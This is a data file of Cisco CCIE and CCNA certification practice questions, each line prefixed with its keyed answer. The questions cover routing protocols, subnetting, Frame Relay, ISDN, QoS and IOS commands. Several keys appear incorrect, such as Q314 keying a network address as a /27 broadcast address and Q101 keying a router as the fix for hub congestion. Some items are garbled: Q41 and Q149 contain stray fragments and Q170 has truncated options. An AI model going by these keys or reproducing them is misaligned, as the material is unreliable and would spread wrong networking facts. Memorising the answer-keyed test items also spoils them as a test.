D	#CCIE Q152 According to the IEEE 802.3 CSMA/CD specification, what MAC address is used for the PAUSE mechanism to inhibit the flow of frames for specified period of time?^A. 0000^B. 0001^C. 003C^D. 0101^E. 1111
B	#CCIE Q153 Using Transmission Control Protocol (TCP) encapsulation, when will the Data Link Switching (DLSW)peers go into CONNECT state?^A. When test frame broadcasts are sent.^B. When the peers finish Capabilities Exchange.^C. Never- there is no such thing as the CONNECT state.^D. When the CUR/ICR exchange takes place.
B	#CCIE Q155 What protocol is not disabled by the no service tcpservers command?^A. Echo^B. Finger^C. Chargen^D. Discard^E. Daytime
B	#CCIE Q156 IEEE 802.1D describes a method to prevent the disconnection of a single end station from disrupting Spanning Tree. ^  What does the method describe?^A. Re-setting the Topology Change flag to zero (0).^B. Disabling the 801.1D Change Detection parameter.^C. Configuring the BridgeForwardDelay to 1/2 of the BridgeMaxage.^D. Using the BridgeForwardDelay timer to age out dynamic entries.
B	#CCIE Q157 In IP multicast networks, the Reverse Path Forward (RPF) check is primarily used to:^A. Determine which interfaces should be included in the outgoing interface list.^B. Prevent multicast traffic from looping through the network.^C. Prevent multicast traffic from being sent by unauthorized sources.^D. Establish the reverse flow path of multicast traffic from the receiver to the source.
C	#CCIE Q158 What is not a primary goal of Random Early Discard?^A. Minimizing packet delay jitter.^B. Avoiding global synchronization for TCP traffic.^C. Supporting bursty traffic without bias.^D. Avoid starvation of the lower priority queues.
B,C	#CCIE Q161 Both GTS and FRTS are similar in implementation, but differ in regard to:^A. GTS applies only on a per interface basis and can use access lists to select the traffic to shape.^B. For GTS, the shaping queue is weighted fair queue (WFQ). For FRTS, WFQ is not supported; instead, the queue can be a CQ, PQ or FIFO.^C. FRTS supports shaping on a per-DLCI basis, while GTS is configurable per interface or subinterface.^D. GTS works with a variety of Layer 2 technologies, including Frame Relay, ATM, Switched Multimegabit Data Service, and Ethernet.
B	#CCIE Q162 A new 10/100 NIC is being connected to a Catalyst 5000 switch port. ^  Which settings will result in the best connection?^A. NIC: 100 Mbps & Full-duplex Catalyst: Auto^B. NIC: Auto Catalyst: 100 Mbps & Full-duplex^C. NIC: 100 Mbps & Half-duplex Catalyst: Auto^D. NIC: 10 Mbps & Half-duplex
E	#CCIE Q163 PIMv2 control messages are sent using which IP protocol?^A. UDP^B. TCP^C. IGMP^D. Protocol number 109^E. Protocol number 103
C,D,E	#CCIE Q164 Which examples would have an administrative distance lower than 120?^A. External EIGRP routes.^B. iBGP routes.^C. Internal EIGRP routes.^D. Static routes.^E. ISIS routes
A	#CCIE Q165 Which statement is true?^A. PNNI has QoS awareness and has layer two reachability support.^B. PNNI ignores QoS and supports both layer two and three routing.^C. PNNI supports redistribution of IP routes to ATM routing tables and route dampening.^D. PNNI comes up automatically when a switch is brought up, while IP routing protocols require specific configuration commands.^E. PNNI must be connected in a three-level hierarchical topology; IP does not require hierarchy.
A	#CCIE Q166 What is the function of the command bgp deterministic-med?^A. It makes BGP compare MEDs between different ASs.^B. It makes default metric count as the worst possible metric.^C. It makes default metric count as the best possible metric.^D. It reorders the entries by neighbor AS.^E. It reorders the entries by MED.
A	#CCIE Q167 When the interface summary command for EIGRP is used, the metric for the summarized route is derived:^A. From the component route that has the biggest metric.^B. From the component route that has the smallest metric.^C. From the interface that has the summary command.^D. From the component route which has the longest mask.^E. From the default-metric command.
A	#CCIE Q168 Which statements are correct?^A. Within one area of ISIS, all links must have ip router isis configured. At least one link in that area must have this command, if the IP routing is to work correctly.^B. In ISIS there is only one router responsible for originating the LSP for the LAN. It is called the pseudonode.^C. The protocol ID, found in the ip header of CLNS is type 203.^D. You can run ISIS for IP, even without configuring a NET on the router.
D	#CCIE Q169 Which are examples for Physical WAN interface standards?^A. EIA/TIA 232, EIA/TIA 449, RFC 1771, and V.35.^B. EIA/TIA 232, EIA/TIA 449, IEEE 802.3 and IEEE 802.5.^C. IEEE 802.3, IEEE 802.5, ISO 8648 and RFC 1771.^D. EIA/TIA 232, EIA/TIA 449, V.35, HSSI and EIA 530.
C	#CCIE Q170 According to the IEEE 802.3 CSMA/CD specification, which is proper signal for contact 6 of a PHY without an internal crossover MDI Signal?^A. Receive +^B. Transmit +^C. Receive ^D. Transmit 
C	#CCIE Q171 Which OSPF routers can originate an ASBR-summary LSA type 4?^A. Only ASBRs.^B. Only ABRs.^C. ASBRs and ABRs if they are originating indication LSAs.^D. ASBRs with the summary command for OSPF routes configured.^E. ABRs with the area-range command configured.
A,C,D	#CCIE Q172 Which BGP attributes are well known?^A. Next-hop^B. Aggregator^C. AS-path^D. Atomic-aggregate^E. MED
B	#CCIE Q173 BGP synchronization means:^A. A BGP router can only advertise an eBGP-learned route if the route is in the BGP table with a metric of 0.^B. A BGP router can only advertise an eBGP-learned route if the route is in the routing table as an IGP route.^C. A BGP router can only advertise an iBGP-learned route if the route is in the routing table of all its iBGP neighbors.^D. A BGP router can only advertise an iBGP-learned route if the route is in the BGP table but not in the routing table.^E. A BGP router can only advertise an iBGP-learned route if the route is in the routing table as an IGP route.
C	#CCIE Q174 A serial interface needs to support IP-based voice traffic in a strict priority queue. ^  All other traffic should be handled through the weighted fair queuing mechanism. ^  What interface level command would enable the queue for the voice traffic?^A. ip llc-queue^B. ip rtp priority^C. priority-group^D. fair-queue
E	#CCIE Q175 What is the EIGRP multicast flow timer?^A. The timer after which EIGRP stops forwarding multicast data traffic.^B. The timeout timer after which EIGRP retransmits, unicasting the neighbor not in CR mode.^C. The time interval between consecutive received EIGRP hello intervals.^D. The timer interval between consecutive transmitted EIGRP hello intervals.^E. The timeout timer after which EIGRP retransmits, unicasting the neighbor in CR mode.
B	#CCIE Q176 RTP typically uses which protocols as a transport?^A. IP/TCP^B. IP/UDP^C. IP/RTCP^D. H.323/H.245^E. None of the above.
C	#CCIE Q177 The first ISUP message sent by an originating node when establishing a call using Signalling System 7 is:^A. an ACM^B. an ANM^C. an IAM^D. a REL^E. A RLC
C	#CCIE Q179 A serial interface with flow-based WFQ is carrying 25 flows. ^  Twelve flows are marked as IP Precedence 0, ten flows are marked as IP Precedence 1, and three flows are marked as IP Precedence 5.^  Approximately how much interface bandwidth is allocated to one of the IP Precedence 5 flows?^A. 4%^B. 6%^C. 12%^D. 15%^E. 25%
A	#CCIE Q180 Through how many states do two ISIS neighbors pass when building their adjacency?^A. 2: Init, Up^B. 3: Init, 2-way, Full^C. 4: Start, Loading, Synchronizing, Up^D. 5: Init, 2-way, Exstart, Exchange, Up^E. 6: Init, 2-way, Exstart, Exchange, Full
D	#CCIE Q181 Which of these codecs consumes the most bandwidth?^A. G.729^B. G.723^C. GSM^D. G.711^E. G.728
A	#CCIE Q182 On a Full Duplex Gigabit link between a Router and a switch the collision counter is incrementing. What is the likely cause?^A. Collisions cannot occur on a Full Duplex Gigabit Link so this is either due to a bug or broken equipment.^B. The Router is receiving too much traffic and is asserting the Collision signal to be able to slow down the rate that the switch is sending traffic.^C. Both the Router and the Switch attempted to send at the same time, both detected this and then backed off and retransmitted after a random amount of time. This is not the problem.^D. The switch and the router might be running 802.1q trunking. When using 802.1q trunking, a collision is counted every time a frame comes in on an incorrect length field.
A	#CCNA Q. 141	Which keystroke allows IOS to complete a partial command entry?	^A: <Tab>	^B: <Ctrl R>	^C: <Spacebar>	^D: <Right Arrow>		
B	#CCNA Q. 265	Which configuration register setting tells the router to look in NVRAM for the boot sequence?	^A: 0x42	^B: 0x2102	^C:0x001	^D: 0x2101		
B	#CCNA Q. 323	What is the bit pattern for the first octet of a class B network address?	^A: 0xxxxxxx	^B: 10xxxxxx	^C: 110xxxxx	^D: 1110xxxx	^E: 11110xxx	
A	#CCNA Q. 237 	What is the bit pattern for the first octet of a class A network address? 	^A: 0xxxxxxx 	^B: 10xxxxxx 	^C: 110xxxxx 	^D: 1110xxxx 	^E: 11110xxx 	
B	#CCNA Q. 195	You are configuring a Frame Relay Router with subinterfaces on interface Serial 0. Which subinterface number could you use for this configuration?	^A: 1 and 2.	^B: 0.2 and 0.3	^C: 1 and 1.1	^D: 0.1a and 0.1b
A	#CCNA Q. 208	Calculate the number of usable networks and usable hosts for the network 210.106.14.0/24.	^A: 1 network with 254 hosts	^B: 2 networks with 128 hosts	^C: 4 networks with 64 hosts	^D: 6 networks with 30 hosts		
D	#CCNA Q. 142	Eight stations connected to separate 10Mbps ports on a layer 2 switch will give each station how many Mbps of bandwidth?	^A: 1.25	^B: 4	^C: 16	^D: 10	^E: 60	
C	#CCNA Q. 50	What is the maximum length of the fast Ethernet cable 100BaseTx standard?	^A: 10 m	^B: 50 m	^C: 100 m	^D: 1000 m		
C	#CCNA Q. 171	Which range of possible numbers do standard IPX access lists have?	^A: 100 - 199	^B: 600 - 699	^C: 800 - 899	^D: 1000 - 1099		
C	#CCNA Q. 248 	What is the range of binary values for the first octet in class B addresses? 	^A: 10000000-11111111 	^B: 00000000-10111111 	^C: 10000000-10111111 	^D: 10000000-11011111 	^E: 11000000-11101111 	
C,D	#CCNA Q. 254 	Which of the following Ethernet standards can operate in full-duplex mode? (Choose two.) 	^A: 10Base2 	^B: 10Base5 	^C: 10BaseT 	^D: 100BaseT 		
D	#CCNA Q. 49	What is the maximum number of subnets that can be assigned to networks when using the address 172.16.0.0 with a subnet mask of 255.255.240.0? (Assume older version UNIX workstations are in use.)	^A: 16	^B: 32	^C: 30	^D: 14	^E: It is an invalid subnet mask for the Network	
B	#CCNA Q. 95	What is the bandwidth capacity of an ISDN B channel?	^A: 16 Kbps	^B: 64 Kbps	^C: 128 Kbps	^D: 512 Kbps	^E: 1.54 Mbps	
D	#CCNA Q. 134	Given an IP address of 172.16.2.160 and a subnet mask of 255.255.255.192, to which subnet does the host belong?	^A: 172.16.2.32	^B: 172.16.2.64	^C: 172.16.2.96	^D: 172.16.2.128	^E: 172.16.2.192	
C	#CCNA Q. 154	Which IP address range is allowable given an IP address of 172.37.2.56 and 28-bits of subnetting?	^A: 172.37.2.48 to 172.37.2.63	^B: 172.37.2.48 to 172.37.2.6.2	^C: 172.37.2.49 to 172.37.2.62	^D: 172.37.2.49 to 172.37.2.63	^E: 172.37.2.55 to 172.37.2.126	
D	#CCNA Q. 226 	What is an example of a valid MAC address? 	^A: 192.201.63.251 	^B: 19-22-01-63-25 	^C: 0000.1234.FEG 	^D: 00-00-12-34-FE-AA 		
A,C,D	#CCNA Q. 31	Given the network 199.141.27.0 with a subnet mask of 255.255.255.240, identify the valid host addresses. (Choose three:)	^A: 199.141.27.33	^B: 199.141.27.112	^C: 199.141.27.119	^D: 199.141.27.126	^E: 199.141.27.175	
A	#CCNA Q. 131	How many valid host IP addresses are available on the following network/subnetwork? 176.12.44.16/30	^A: 2	^B: 30	^C: 254	^D: 16,382	^E: 65,534	
C	#CCNA Q. 238 	What is the network address for a host with the IP address 201.100.5.68/28? 	^A: 201.100.5.0 	^B: 2001.100.5.32 	^C: 201.100.5.64 	^D: 201.100.5.65 	^E: 201.100.5.31 	^F: 201.100.5.1 
B	#CCNA Q. 314	Which of the following is a subnet broadcast address for network 201.57.78.0/27?	^A: 201.57.78.33	^B: 201.57.78.64	^C: 201.57.78.87	^D: 201.57.78.97	^E: 201.57.78.159	^F: 201.57.78.254
E	#CCNA Q. 174	What is the bit length and expression form of a MAC address?	^A: 24 bits expressed as a decimal number	^B: 24 bits expressed as a hexadecimal number	^C: 36 bits expressed as a binary number	^D: 48 bits expressed as a decimal number	^E: 48 bits expressed as a hexadecimal number
A	#CCNA Q. 114	Which network mask should you place on a class C address to accommodate a user requirement of two sub networks with a maximum of 35 hosts on each network?	^A: 255.255.255.192	^B: 255.255.255.224	^C: 255.255.255.240	^D: 255.255.255.248		
B	#CCNA Q. 205 	Which network mask should you place on a class C address to accommodate a user requirement for five networks with a maximum of 17 hosts on each network? 	^A: 255.255.255.192 	^B: 255.255.255.224 	^C: 255.255.255.240 	^D: 255.255.255.248 		
C	#CCNA Q. 259	Which of the following describes ISDN BRI service?	^A: 2d+b	^B: 23d+b	^C: 2b+d	^D: 23b+d
E	#CCNA Q. 196	What is the total bandwidth of all channels on a BRI circuit?	^A: 54 kps	^B: 64 kps	^C: 112 kps	^D: 128 kps	^E: 144 kps	
D	#CCNA Q. 102	What is the distance limitation for 100BaseT?	^A: 607 ft	^B: 25 meters	^C: 1000 ft	^D: 100 meters	^E: 185 meters	
E	#CCNA Q. 313	Calculate the number of usable network and host addresses for 213.105.72.0/28.	^A: 62 networks and 2 hosts	^B: 6 networks and 30 hosts	^C: 8 networks and 32 hosts	^D: 16 networks and 16 hosts	^E: 14 networks and 14 hosts
D	#CCNA Q. 284	What IP address class is multicast? 	^A: A 	^B: B 	^C: C 	^D: D 	^E: E 	
A,B	#CCNA Q. 69	Which two statements about a bridge are true. (Choose two)	^A: A bridge floods multicasts.	^B: A bridge floods broadcasts.	^C: A bridge does not flood multicasts.	^D: A bridge does not flood broadcasts.		
C	#CCNA Q. 71	Which statement about an IP network is true?	^A: A broadcast source MAC contains all zeros.	^B: A MAC address is part of the physical layer of the OSI model.	^C: MAC addresses are used by bridges to make forwarding decisions: IP addresses are used by routers.	^D: IP addresses are now a flat addressing scheme: MAC addresses use a hierarchical addressing scheme.
B,C	#CCNA Q. 229	Which two statements about Frame Tagging are true? (Choose two)	^A: A Filtering table is developed for each switch.	^B: Frame Tagging defines a unique user defined ID to each frame.	^C: A unique identifier is placed in the header of each frame as it is forwarded between switches.	^D: Frame Tagging is a technique that examines particular information about each frame based on user-defined offsets.
A,B	#CCNA Q. 268	Which of the following statements regarding routed and routing protocols are true? (Choose two.)	^A: A routed protocol is assigned to an interface and determines the method of packet delivery.	^B: A routing protocol determines the path of a packet through a network.	^C: A routed protocol determines the path of a packet through a network.	^D: A routing protocol operates at the transport layer of the OSI model.	^E: A routed protocol updates the routing table of a router.	
D	#CCNA Q. 267	Which of the following access list statements will deny all telnet connections to subnet 10.0.1.0/24?	^A: access-list 15 deny tcp 10.0.1.0 255.255.255.0 eq telnet	^B: access-list 115 deny tcp any 10.0.1.0 eq telnet	^C: access-list 115 deny udp any 10.0.1.0 eq 23	^D: access-list 115 deny tcp any 10.0.1.0 0.0.0.255 eq 23	^E: access-list 15 deny telnet any 10.0.1.0 0.0.0.255 eq 23	
D	#CCNA Q. 113	Which statement should you use to deny FTP access only from Network 210.93.105.0 to Network 223.8.151.0?	^A: Access-list one deny 210.93.105.0.0.0.0.0.0 any eq ftp access-list one permit any.	^B: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp	^C: Access-list 100 deny ip 223.8.151.0 0.0.0.255 any eq ftp	Access-list 100 permit ip any any	^D: Access-list 100 deny tcp 210.93.105.0 0.0.0.255 223.8.151.0 0.0.0.255 eq ftp	Access-list 100 permit ip any any
B	#CCNA Q. 96	Which command should you use to create an IP standard access list?	^A: Access-list standard 172.16.4.13	^B: Access-list 1 deny 172.16.4.13 0.0.0.0	^C: Access-list 100 deny 172.16.4.13 0.0.0.0	^D: Access-list 198 deny 172.16.4.13 255.255.255.255		
B	#CCNA Q. 101	A network is very congested. Currently all the devices are connected through a hub. Which solution would best decrease congestion on the network?	^A: Add a second hub	^B: Replace the hub with a router.	^C: Replace the hub with a switch.	^D: Replace the hub with a repeater.
D	#CCNA Q. 145	What does the command show access-list 101 list?	^A: All extended access lists.	^B: All access lists within the router.	^C: The contents of standard access list 101	^D: The contents of extended access list 101		
A,C,D,E	#CCNA Q. 48	Which of the following are true regarding passwords on a Cisco router?	^A: All passwords can be encrypted.	^B: All passwords can be entered using the set-up dialogue.	^C: A password can be set before a user can enter the privileged mode.	^D: A password can be set for individual lines.	^E: TACACS or Radius password authentication can be used.
A,C,D	#CCNA Q. 258	What are the advantages of using the OSI layered network model? (Choose three)	^A: Allows multiple-vendor development through standardization of network components.	^B: Creates a list of communication rules that all companies must implement to get onto the Internet.	^C: Allows various types of network hardware and software to communicate.	^D: Prevents changes in one layer from affecting other layers, so it does not hamper development.	^E: Allows companies to develop proprietary interfaces.	
C	#CCNA Q. 215	What are the generic parts of a network layer address?	^A: An internetwork number and a URL.	^B: A vendor code and a serial number.	^C: A network number and host number.	^D: A broadcast number and unicast number.	^E: A domain identifier and a device identifier.
D	#CCNA Q. 308	Which of the following is true concerning Frame Relay multipoint subinterfaces?	^A: An IP address is required on the physical interface of the central router.	^B: All routers are required to be fully meshed.	^C: All routers must be in the same subnet to forward routing updates and broadcasts	^D: Multipoint is the default configuration for Frame Relay subinterfaces.
C	#CCNA Q. 320	Which layer in the TCP/IP model corresponds to the OSI network layer?	^A: Application	^B: Transport	^C: Internet	^D: Network	^E: Physical	
D	#CCNA Q. 292	Which OSI layer uses positive acknowledgement and retransmission to ensure reliable delivery?	^A: Application	^B: Presentation	^C: Session	^D: Transport	^E: Data link	^F: Physical
D	#CCNA Q. 252 	Which OSI layer ensures reliable end-to-end delivery of data? 	^A: application 	^B: presentation 	^C: session 	^D: transport 	^E: network 	
B,C,E	#CCNA Q. 249 	Which of the following are TCP/IP Application layer protocols? (Choose three) 	^A: ARP 	^B: HTTP 	^C: SMTP 	^D: ETP 	^E: ICMP 	
A	#CCNA Q. 274	What is the correct command to change the bandwidth of the interface to 64K?	^A: bandwidth 64	^B: band width 64	^C: bandwidth 64000	^D: band width 64000	^E: bandwidth 64K	
A	#CCNA Q. 108	Which command allows the user to see a system message when logging into a router?	^A: Banner MOTD	^B: Message MOTD	^C: Banner Message	^D: Message Banner								
B	#CCNA Q. 57	Which term describes the process in which frames from one network system are placed inside the frames of another network system?	^A: bridging	^B: tunneling	^C: data-link control	^D: generic routing	^E: packet switching							
B	#CCNA Q. 157	What does the term 'Base' refer to in 100BaseT?	^A: Cabling type	^B: Signaling type	^C: 100 mode type	^D: Spectrum used	^E: Speed category
A,B,D	#CCNA Q. 79	Which three are typical operational phases in a basic connection oriented network service? (Choose three)	^A: Call setup	^B: Data transfer	^C: Load Balancing	^D: Call termination	^E: Call prioritization	^F: Data segmentation	^G: Data link identification					
C	#CCNA Q. 317	What does the word -any- mean in the following extended access list statement? access-list 101 permit ip any 192.168.69.0 0.0.0.255 eq tcp	^A: check any of the bits in the source address	^B: permit any wildcard mask for the address	^C: accept any source address	^D: check any bit in the destination address	^E: permit 255.255.255 0.0.0.0	^F: accept any destination address
B	#CCNA Q. 130	Which element is used to define the rate, in bits per second, which a Frame Relay switch agrees to transfer data?	^A: Clock rate	^B: Committed information rate	^C: Local management interface	^D: Data-link connection identifier	^E: Committed rate measurement interval							
B	#CCNA Q. 56 	Which element is used to define the rate, in bits per second, that a Frame Relay switch agrees to transfer data?	^A: Clock rate (CR).	^B: Committed Information Rate (CIR)	^C: Local management interface (LMI)	^D: Data-link connection identifier (DLCI)	^E: Committed Rate Measurement Interval (CRMI)							
D	#CCNA Q. 103	Which command sets the clock rate to 56 Kbps on serial0?	^A: clockrate 56	^B: clock rate 56	^C: clockrate 56000	^D: clock rate 56000	^E: set clockrate 56	^F: serial 10 clockrate 56	^G: clock rate 56000 serial 10					
C	#CCNA Q. 107	Which command retrieves the configuration file from NVRAM?	^A: Config NVRAM	^B: Copy NVRAM running-config	^C: Copy startup-config running-config	^D: Copy running-config startup-config								
A,B,F	#CCNA Q. 181	Which three commands are used to configure information into RAM on a router. (Choose three)	^A: Configure memory	^B: Configure terminal	^C: Configure overwrite	^D: Copy TFTP startup-Config	^E: Copy running-Config startup-Config	^F: Copy startup-Config running-Config						
A	#CCNA Q. 194	Which configuration task must you complete if a remote Frame Relay Router does not support Inverse ARP?	^A: Configure static maps.	^B: Define an IP address	^C: Disable DHCP on the Frame Relay router.	^D: Configure a static route to the remote network.								
C	#CCNA Q. 184	You just entered the following command routers(config) #line console 0 Which operation is most likely to follow?	^A: Configure terminal type	^B: Enter protocol parameters for a serial line	^C: Create a password on the console terminal line.	^D: Establish a terminal type 4 connection to a remote host.	^E: Change from configuration mode to console privilege mode.							
B,C	#CCNA Q. 149	Which two steps are parts of the process of creating Frame Relay subinterfaces on a point-point connection? (Choose Two)	^A: Configure the router to forward all broadcast packets	^B: Remove any network address assigned to the physical interface	^C: Configure the local data-link connection identifier for the subinterfaces	^D: Partition the total committed information rate available among the subinterfaces network 192.168.1.0 255.255.255.0 network 10.2.0.0 255.255.0.0
D	#CCNA Q. 235	Which sequence of actions will allow telnetting from a user's PC to a router using TCP/IP?	^A: Connect the PC's COM port to the router's console port using a straight-through cable.	^B: Connect the PC's COM port to the router's console port using a crossover cable.	^C: Connect the PC's COM port to the router's Ethernet port using a straight-through cable.	^D: Connect the PC's Ethernet port to the router's Ethernet port using a crossover cable.	^E: Connect the PC's Ethernet port to the router's Ethernet port using a rollover cable.	^F: Connect the PC's Ethernet port to the router's Ethernet port using a straight-through cable.
D	#CCNA Q. 37	Which parameter must be supplied when initializing the IGRP routing process?	^A: connected network numbers	^B: IP address mask	^C: metric weights	^D: autonomous system number	^E: registered administrative id
A,B,D	#CCNA Q. 224	Which three functions are supported by connection oriented services? (Choose three)	^A: Connection parameters are synchronized	^B: Any loss or duplication of packets can be corrected	^C: The data packet is independently routed and the service does not guarantee the packet will be processed in order.	^D: A data communication path is established between the requesting entity and the peer device on the remote end system.
C	#CCNA Q. 175	Which command displays all the commands in the history buffer?	^A: control header	^B: show buffer	^C: show history	^D: show history buffer						
D	#CCNA Q. 179	Which command loads a new version of Cisco IOS into the router?	^A: Copy flash ftp	^B: Copy ftp flash	^C: Copy flash tftp	^D: Copy tftp flash
A	#CCNA Q. 106	Routers that have flash memory typically have a preloaded copy of Cisco IOS software. Which command should you use to make a backup copy of the software image onto a network server?	^A: Copy Flash TFTP	^B: Save Copy TFTP	^C: Write Backup TFTP	^D: Write Backup (server-name)	^E: Copy backup 2 (server-name)
C	#CCNA Q. 213 	You have powered on a new router and you want to create an initial configuration. Which mode should you use? 	^A: Copy mode 	^B: User mode 	^C: Setup mode 	^D: Startup mode 						
F	#CCNA Q. 122	With one method of transmitting frames through a switch, the switch receives the complete frame and checks the frame CRC before forwarding the frame. What is this transmitting method called?	^A: CSMA/CD	^B: Full duplex.	^C: Cut through.	^D: Half duplex.	^E: Fragmentation.	^F: Stored and forwarded.
C	#CCNA Q. 228	With one method for transporting frames through a switch, the switch checks the destination address in the frame header and immediately begins forwarding the frame. What is this frame transmission method called?	^A: CSMA/CD	^B: FULL DUPLEX	^C: CUT THROUGH	^D: HALF DUPLEX	^E: FRAGMENTATION	^F: STORE AND FORWARD
C	#CCNA Q. 290	Cisco IOS allows which keystroke(s) to complete the syntax of a partially entered command?	^A: Ctrl+shift+6 then x.	^B: Ctrl+Z	^C: TAB	^D: /?	^E: Shift					
A	#CCNA Q. 105	In the setup dialogue what do the square brackets indicate?	^A: Current or default settings.	^B: Hard coded values that cannot be modified.	^C: Values entered by the administrator but not saved.	^D: Values that must be returned to NVRAM before becoming enabled.
D	#CCNA Q. 13	A packet is the protocol data unit for which layer of the OSI model?	^A: Data link	^B: Session	^C: Presentation	^D: Network	^E: Transport					
B	#CCNA Q. 319 	At which OSI layer is the best path to a network determined?	^A: Data Link	^B: Network	^C: Physical	^D: Presentation	^E: Session	^F: Transport
A	#CCNA Q. 198	What does the Frame Relay switch use to distinguish between each PVC connection?	^A: Data link connection identifier (DLCIs)	^B: CNs	^C: FECNs	^D: Local management interface LMI						
F	#CCNA Q. 255 	What is the correct order of protocol data units in data encapsulation? 	^A: Data, Frame, Packet, Segment, Bit 	^B: Data, Frame, Segment, Packet, Bit 	^C: Data, Packet, Frame, Segment, Bit 	^D: Data, Packet, Segment, Frame, Bit 	^E: Data, Segment, Frame, Packet, Bit 	^F: Data, Segment, Packet, Frame, Bit 				
C	#CCNA Q. 8	During encapsulation in which order is information packaged?	^A: Data, Packet, Segment, Frame	^B: Segment, Data, Packet, Frame	^C: Data, Segment, Packet, Frame	^D: Packet, Data, Segment, frame						
A,B	#CCNA Q. 190	Which are two steps are required to configure and apply standard access list on an interface? (Choose two)	^A: Define and access list number and its parameter.	^B: Enable an interface to become part of the access list group.	^C: Define the number of access list to be supported on an interface.	^D: Copy the access list definition to each interface that will support it.						
A,B,C	#CCNA Q. 92	Which three tasks are required to configure a dial on demand routing (DDR) Basic Rate Interface (BRI) connection? (Choose three)	^A: Define static routes.	^B: Configure the dialer information.	^C: Specify interesting traffic that can enable the link.	^D: Define DDR password to exchange when the link comes up.						
C	#CCNA Q. 185	Which information must a router have in order to perform proper and efficient routing?	^A: Destination application of an incoming packet	^B: Number of other packets in a single flow of data	^C: Destination network address of an incoming packet	^D: Number of routers that know a path to the destination						
A,C	#CCNA Q. 86	Your network uses a class C address of 210.10.10.0 you must now split up the network into separate subnets to handle multiple buildings separated by router. Which two steps must you take to determine the proper subnet mask for your network? (Choose two)	^A: Determine the number of separate networks required	^B: Determine how many devices will require DHCP addressing.	^C: Determine the maximum number of host that will be on each subnet.	^D: Determine the minimum number of host that will be on each subnet.	^E: Determine which router will be the IP default gateway for each subnet.		
D	#CCNA Q. 275	Which Frame Relay feature is responsible for transmitting keepalives to ensure that the PVC does not shut down because of inactivity?	^A: DLCI	^B: BECN	^C: FECN	^D: LMI	^E: CIR	^F: de			
A,B,C	#CCNA Q. 94	Which three statements about Frame Relay configuration using sub interfaces are true? (Choose three)	^A: Each subinterface is configured either multi point or point to point.	^B: Any network address must be removed from the physical interface.	^C: The configuration of subinterfaces is done in router Config-(if)# mode.	^D: Frame relay encapsulation must be configured on each sub interface.			
A,B	#CCNA Q. 83	What is the two most common request/reply pair with ICMP messages when using the ping command? (Choose two)	^A: Echo reply	^B: Echo request	^C: Source quench	^D: Fragment offset	^E: Information redirect	^F: Destination reachable	^G: Echo control message
B,C	#CCNA Q. 306	Which of the following are the characteristics of a Layer 2 Ethernet switch? (Choose two.)	^A: Establishes a single collision domain.	^B: Establishes multiple collision domains.	^C: Builds a dynamic MAC address mapping table	^D: Maintains a routing table	^E: Forwards unicast frames only.		
C,D	#CCNA Q. 230	Which two physical interfaces does PPP support? (Choose two) 	^A: Ethernet 	^B: Token Ring 	^C: Synchronous Serial 	^D: Asynchronous Serial 			
A,D	#CCNA Q. 125	Which two statements are true? (Choose two)	^A: Ethernet 802.3 utilizes a half duplex method for data transfer.	^B: In a 100mbps point to point connect, a full duplex connection can provide 400mbs of data transfer.	^C: Ethernet switches can use the full duplex mode to connect multiple nodes on a single port office	switch.	^D: Full duplex Ethernet takes advantage of UTP using one pair of transmission and other pair for	reception.	
A,D	#CCNA Q. 210 	Which two IPX encapsulation names are correctly paired with the Cisco IOS encapsulation names? (Choose two) 	^A: Ethernet_II-ARPA 	^B: Ethernet_802.3-SAP 	^C: Ethernet_802.2-LLLC 	^D: Ethernet_SNAP-SNAP 			
A	#CCNA Q. 277	Identify the effect of Ctrl-Z?	^A: Exits back to privileged exec mode.	^B: Disconnects from the router.	^C: Aborts the ping operation.	^D: Exits privileged exec mode				
A,B,C,D	#CCNA Q. 64	What are four ways that Fast Ethernet compares to 10BaseT Ethernet? (Choose four.)	^A: Fast Ethernet uses the Same Maximum Transmission Unit (MTU).	^B: Fast Ethernet is based on an extension to the IEEE 802.3 specification.	^C: Fast Ethernet uses the same Media Access control (MAC mechanisms).	^D: Fast Ethernet preserves the frame format that is used by 10BaseT Ethernet.	^E: Fast Ethernet offers a speed increase one hundred times that of the 10BaseT Ethernet.		
A,B,C,D	#CCNA Q. 188	What are four ways that Fast Ethernet compares to 10BaseT Ethernet? (Choose four)	^A: Fast Ethernet uses the same maximum transmission unit (MTU).	^B: Fast Ethernet is based on an extension to the IEEE 802.3 specifications.	^C: Fast Ethernet uses the same media access control MAC mechanism.	^D: Fast Ethernet preserves the frame format that is used by the 10BaseT Ethernet.	^E: Fast Ethernet uses a speed increase 100 times to that of the 10BaseT Ethernet.		
D	#CCNA Q. 279	Which WAN technology uses high-performance digital lines and IS packet switched?	^A: FDDI	^B: ISDN	^C: ATM	^D: Frame Relay			
A	#CCNA Q. 245 	When a router boots. Which default search sequence does it use to locate the IOS software? 	^A: Flash, TFTP server, ROM 	^B: NVRAM, TFTP server, ROM 	^C: ROM, Flash, TFTP server 	^D: ROM, NVRAM, TFTP server 			
B	#CCNA Q. 35	Which method does a Cisco Catalyst switch use to identify the VLAN membership of a frame over trunked links?	^A: Frame filtering with VLAN ID	^B: Frame tagging with VLAN ID	^C: Frame filtering with trunk ID	^D: Frame tagging with trunk ID	^E: Frame filtering with VTP port ID		
C	#CCNA Q. 240 	Which WAN service would a small office (SOHO) most likely choose as a backup for leased lines? 	^A: frame relay with svc 	^B: dedicated serial line 	^C: isdn with ddr 	^D: atm 			
D,F	#CCNA Q. 66	What are the two primary operating modes for frame switching? (Choose two)	^A: Full duplex	^B: Half duplex	^C: CSMA/CD	^D: Cut through	^E: Fragmentation	^F: Store and forward	
A,B,D,E	#CCNA Q. 41	What are four benefits that can result from applying ISDN networking?(Choose four)	^A: Full time connectivity across the ISDN supported by Cisco IOS routing using dial on demand routing DDR	^B: Small office and home office sites can be economically supported with ISDN basic rate interface BRI	services.	^C: ISDN replaces signaling system ss7 in the public switch telephone network PSTN backbone.	^D: ISDN can be used as a backup service for a lease line connection between the remote and central offices.	network access servers NAS.					
B,C	#CCNA Q. 304	Which of the following statements are true regarding full-duplex Ethernet when compared to half-duplex Ethernet? (Choose two.)	^A: Full-duplex Ethernet consists of a shared broadcast domain, while half-duplex Ethernet consists of a private broadcast domain.	^B: Full-duplex Ethernet is collision free, while half-duplex Ethernet is subject to collisions.	^C: Full-duplex Ethernet provides higher throughput than half-duplex Ethernet of the same bandwidth.	^D: Full-duplex Ethernet provides lower throughput than than half-duplex Ethernet of the same bandwidth.	^E: Full-duplex Ethernet consists of a shared cable segment, while half-duplex Ethernet provides a point-topoint link.						
